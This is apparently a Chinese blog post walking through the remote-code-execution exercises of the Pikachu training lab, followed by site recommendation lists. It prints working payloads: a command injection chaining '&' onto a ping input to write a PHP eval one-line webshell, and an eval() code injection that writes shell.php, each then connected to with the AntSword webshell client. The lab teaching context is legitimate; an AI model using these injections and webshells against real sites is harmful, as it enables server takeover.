技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
TON_G-T
26 分钟前
useEffect为什么会触发死循环
java·服务器·前端
tHeya06II
1 小时前
涵盖 Cursor、Claude Code、Skills
java·服务器
maosheng1146
1 小时前
Linux的第二次作业
linux·运维·服务器
maosheng1146
1 小时前
Linux
linux·运维·服务器
sR916Mecz
2 小时前
Linux 服务器磁盘扩容与目录迁移:rsync + bind mount 实现服务无感迁移(无需修改配置)
java·linux·服务器
0xDevNull
2 小时前
Linux服务器日志查看完全指南
linux·运维·服务器
songx_99
2 小时前
Linux基础1
linux·运维·服务器
菱玖
2 小时前
Linux 系统性能排查常用指令
linux·运维·服务器
皮卡蛋炒饭.
3 小时前
进程间通信
linux·运维·服务器
小陈工
3 小时前
Python Web开发入门(十二):使用Flask-RESTful构建API——让后端开发更优雅
开发语言·前端·python·安全·oracle·flask·restful
热门推荐
01GitHub 镜像站点02Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)03VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线06最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化07AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南08纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!092026年3月AI领域大事件:DeepSeek引领开源风暴10Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程